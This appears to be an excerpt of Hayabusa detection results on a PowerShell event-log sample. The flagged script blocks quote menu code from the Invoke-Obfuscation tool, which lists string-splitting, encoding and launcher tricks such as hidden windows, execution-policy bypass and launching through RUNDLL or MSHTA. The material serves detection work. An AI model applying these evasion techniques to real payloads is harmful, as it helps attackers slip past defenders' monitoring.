@('Out-ObfuscatedTokenCommand', 'Member', 1)) $MenuLevel_Token_Member += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Member', 2)) $MenuLevel_Token_Member += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('dOwnLo'+'AdsT'+'Ring').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 3)) $MenuLevel_Token_Member += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'dString','Downloa').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 4)) $MenuLevel_Token_Variable = @() $MenuLevel_Token_Variable += , @($LineSpacing, '1' , 'Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' , @('Out-ObfuscatedTokenCommand', 'Variable', 1)) $MenuLevel_Token_Type = @() $MenuLevel_Token_Type += , @($LineSpacing, '1' , ""Type Cast + Concatenate --> e.g. <[Type]('Con'+'sole')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 1)) $MenuLevel_Token_Type += , @($LineSpacing, '2' , ""Type Cast + Reordered --> e.g. <[Type]('{1}{0}'-f'sole','Con')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 2)) $MenuLevel_Token_Whitespace = @() $MenuLevel_Token_Whitespace += , @($LineSpacing, '1' , ""`tRandom Whitespace --> e.g. <.( 'Ne' +'w-Ob' + 'ject')>"" , @('Out-ObfuscatedTokenCommand', 'RandomWhitespace', 1)) $MenuLevel_Token_Comment = @() $MenuLevel_Token_Comment += , @($LineSpacing, '1' , ""Remove Comments --> e.g. self-explanatory"" , @('Out-ObfuscatedTokenCommand', 'Comment', 1)) $MenuLevel_Token_All = @() $MenuLevel_Token_All += , @($LineSpacing, '1' , ""`tExecute Token obfuscation techniques (random order)"" , @('Out-ObfuscatedTokenCommandAll', '', '')) # Main\String Menu. $MenuLevel_String = @() $MenuLevel_String += , @($LineSpacing, '1' , ' entire command' , @('Out-ObfuscatedStringCommand', '', 1)) $MenuLevel_String += , @($LineSpacing, '2' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 2)) $MenuLevel_String += , @($LineSpacing, '3' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 3)) # Main\Encoding Menu. $MenuLevel_Encoding = @() $MenuLevel_Encoding += , @($LineSpacing, '1' , ""`tEncode entire command as "" , @('Out-EncodedAsciiCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '2' , ""`tEncode entire command as "" , @('Out-EncodedHexCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '3' , ""`tEncode entire command as "" , @('Out-EncodedOctalCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '4' , ""`tEncode entire command as "" , @('Out-EncodedBinaryCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '5' , ""`tEncrypt entire command as (AES)"" , @('Out-SecureStringCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '6' , ""`tEncode entire command as "" , @('Out-EncodedBXORCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '7' , ""`tEncode entire command as "" , @('Out-EncodedSpecialCharOnlyCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '8' , ""`tEncode entire command as "" , @('Out-EncodedWhitespaceCommand' , '', '')) # Main\Launcher Menu. $MenuLevel_Launcher = @() $MenuLevel_Launcher += , @($LineSpacing, 'PS' , ""`t"") $MenuLevel_Launcher += , @($LineSpacing, 'CMD' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'WMIC' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'VAR+' , 'Cmd + set && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN+' , 'Cmd + | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP+' , 'Cmd + | Clip && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'VAR++' , 'Cmd + set && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN++' , 'Cmd + set && Cmd | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP++' , 'Cmd + | Clip && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher += , @($LineSpacing, 'MSHTA++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher_PS = @() $MenuLevel_Launcher_PS += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_PS += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_CMD = @() $MenuLevel_Launcher_CMD += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_WMIC = @() $MenuLevel_Launcher_WMIC += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_RUNDLL = @() $MenuLevel_Launcher_RUNDLL += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '4' , '-NoProfile'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '4')) ${MenuLevel_Launcher_VAR+} = @() ${MenuLevel_Launcher_VAR+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_STDIN+} = @() ${MenuLevel_Launcher_STDIN+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_CLIP+} = @() ${MenuLevel_Launcher_CLIP+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_VAR++} = @() ${MenuLevel_Launcher_VAR++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_STDIN++} = @() ${MenuLevel_Launcher_STDIN++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '0' , ""`tNO EXECUTION FLAGS"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '1' , ""`t-NoExit"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '2' , ""`t-NonInteractive"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '3' , ""`t-NoLogo"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '4' , ""`t-NoProfile"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '5' , ""`t-Command"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '6' , ""`t-WindowStyle Hidden"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '7' , ""`t-ExecutionPolicy Bypass"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '8' , ""`t-Wow64 (to path 32-bit powershell.exe)"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_CLIP++} = @() ${MenuLevel_Launcher_CLIP++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_RUNDLL++} = @() ${MenuLevel_Launcher_RUNDLL++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '2' , '-NonInteractive'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '4')) ${MenuLevel_Launcher_VAR+} = @() ${MenuLevel_Launcher_VAR+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_STDIN+} = @() ${MenuLevel_Launcher_STDIN+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_CLIP+} = @() ${MenuLevel_Launcher_CLIP+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_VAR++} = @() ${MenuLevel_Launcher_VAR++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_STDIN++} = @() ${MenuLevel_Launcher_STDIN++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '0' , ""`tNO EXECUTION FLAGS"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '1' , ""`t-NoExit"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '2' , ""`t-NonInteractive"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '3' , ""`t-NoLogo"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '4' , ""`t-NoProfile"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '5' , ""`t-Command"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '6' , ""`t-WindowStyle Hidden"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '7' , ""`t-ExecutionPolicy Bypass"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '8' , ""`t-Wow64 (to path 32-bit powershell.exe)"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_CLIP++} = @() ${MenuLevel_Launcher_CLIP++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_RUNDLL++} = @() ${MenuLevel_Launcher_RUNDLL++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, 